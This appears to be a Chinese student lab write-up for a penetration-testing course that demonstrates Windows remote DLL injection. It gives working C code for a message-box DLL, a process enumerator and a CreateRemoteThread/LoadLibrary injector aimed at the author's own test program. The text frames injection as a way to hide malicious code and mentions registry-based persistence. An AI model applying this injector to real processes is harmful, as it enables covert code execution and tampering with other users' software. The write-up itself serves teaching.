20145319 《网络渗透》免考—远程注入

概述

• 本次实验在window环境下进行，通过将自己编写的dll文件以远程线程的方式注入到宿主程序的虚拟地址空间中完成注入
• 主要知识如下
  • 动静态库相关知识（语法以及制作）
  • 进程，线程相关概念
  • 系统快照，进程枚举等相关知识（windows api函数）

实验内容

概述

• 当我们运行一个应用程序时，就会在系统中创建一个进程，可以说进程就是一个程序的执行实例。而线程是操作系统能够进行运算调度的最小单位，被包含在进程中，是进程的实际运作单位。
• 正常状况下，每个进程被创建时，系统都会分配给其相应的一块虚拟地址空间，将可执行文件或者dll文件的代码加载到该进程空间中执行，理论上，这个虚拟地址空间相当于该进程的“私人空间”，但是CreateRemoteThread函数，通过这个API函数则可以为一个进程新增一个线程，我们就可以通过这个方法来将自身的恶意代码包装成一个线程，来加载到进程的虚拟空间空间中执行，并且共享宿主进程的空间资源，同样，因为我们的恶意代码是作为一个线程“寄生”在宿主进程中的，所以在任务管理器上也无法显示出来，一定程度上也实现了隐藏

步骤

• 首先将我们的恶意代码写成一个dll文件，dll文件编写可以参考静态库和动态库的制作

• 编写一个简单dll，当加载成功时弹窗提示

  #include "windows.h"
  
  BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
  
  {
      switch (fdwReason){
          case DLL_PROCESS_ATTACH:   //dll被加载时，弹出提示
              MessageBox(NULL, TEXT("hello,5319"), TEXT("提示"), MB_OK);
              break;
  
          case DLL_PROCESS_DETACH:   //dll被清除时，弹出提示
              MessageBox(NULL, TEXT("goodbye,5319"), TEXT("提示"), MB_OK);
              break;
      }
  
      return true;
  }

• 写好了我们的“病毒”程序，我们就需要寻找我们的目标作为宿主（这里我选择了一个自己编写的窗口小程序hello5319.exe）通过系统函数获取其Pid以便进行下一步操作

  DWORD getPID()
  {
      PROCESSENTRY32 pe32;
      pe32.dwSize = sizeof(pe32);
  
      HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  
      if (hProcessSnap == INVALID_HANDLE_VALUE)
  
      {
          return false;
      }
  
      BOOL bMore = Process32First(hProcessSnap, &pe32);
      while (bMore)
      {
          if (!stricmp(pe32.szExeFile, "hello5319.exe")){  //获取该进程的句柄
              HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS,false, pe32.th32ProcessID);
              if (handle == NULL)
              {
                  exit(0);
              }
              CloseHandle(hProcessSnap);
              CloseHandle(handle);
              break;
  
          }
          else
              bMore = Process32Next(hProcessSnap, &pe32);
  
      }
  
      return pe32.th32ProcessID; //返回此进程ID  
  
  }

• 之后就在进程中分配相应空间，创建新线程，使用函数loadlibrary完成dll加载，函数实现如下

  BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
  {
  
      HANDLE hProcess;
  
      hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId);
  
      char *pszdll;
  
      pszdll = (char *)VirtualAllocEx(hProcess, NULL, lstrlen(DllFullPath) + 1,MEM_COMMIT, PAGE_READWRITE);  //在远程进程的内存地址空间分配DLL文件名空间 
  
      WriteProcessMemory(hProcess,pszdll, (void *)DllFullPath, lstrlen(DllFullPath) + 1, NULL);//将DLL的路径名写入到远程进程的内存空间  
  
      DWORD dwID;
      LPVOID pFunc = LoadLibrary;
      HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc,pszdll, 0, &dwID);
  
      CloseHandle(hProcess);
      CloseHandle(hThread);
  
      return TRUE;
  }

  运行结果

• 首先运行我们的宿主程序hello5319.exe，然后运行我们的注入程序，就可以看到结果

• 

• 当我们关闭宿主程序时，则弹出提示goodbye,5319

• 

• 以上我们的远程注入就算是成功了，但是要想进一步完善则需要运用到更多技术，例如，当宿主程序关闭时，dll文件即被清除，无法将其隐藏并保存下来，我们就需要运用资源节方面的技术，或是将修改注册表，将注入程序添加到自启动项，每次开机都完成一次注入，不过那只能等到下一次再一一介绍了